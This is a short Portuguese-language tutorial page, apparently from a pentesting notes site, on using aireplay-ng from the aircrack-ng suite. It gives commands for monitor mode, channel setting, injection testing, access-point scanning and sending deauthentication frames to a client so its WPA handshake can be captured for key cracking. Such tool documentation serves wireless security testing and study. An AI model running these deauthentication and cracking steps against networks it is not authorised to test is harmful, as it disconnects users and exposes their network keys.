Aireplay-ng

A função primária do é gerar tráfego para uso posterior no aircrack-ng para quebrar as chaves WEP e WPA-PSK. Existem diferentes ataques que podem causar desautenticação com o propósito de capturar dados de handshake WPA, autenticações falsas, repetição interativa de pacotes, injeção de solicitação ARP feita à mão e reinjeção de solicitação ARP. Com a ferramenta packetforge-ng é possível criar frames arbitrários

Para listar todos os recursos, aireplay-ngusamos o seguinte comando.

aireplay-ng

Habilitar o modo monitor

sudo airmon-ng start wlan0 1

Como alternativa, podemos usar o iwcomando para definir o canal da seguinte forma

sudo iw dev wlan0mon set channel 1

Testando para injeção de pacotes

sudo aireplay-ng --test wlan0mon

Usando Aireplay-ng para realizar a desautenticação

Primeiro, vamos usar o airodump-ng para visualizar as redes WiFi disponíveis, também conhecidas como pontos de acesso (APs).

sudo airodump-ng wlan0mon

Vamos enviar uma solicitação de desautenticação para um dos clientes com o ID da estação 00:0F:B5:32:31:31.

sudo aireplay-ng -0 5 -a <MAC Address AP> -c <MAC Address client> wlan0mon

PreviousAirgraph-ng NextAirdecap-ng

Last updated 5 months ago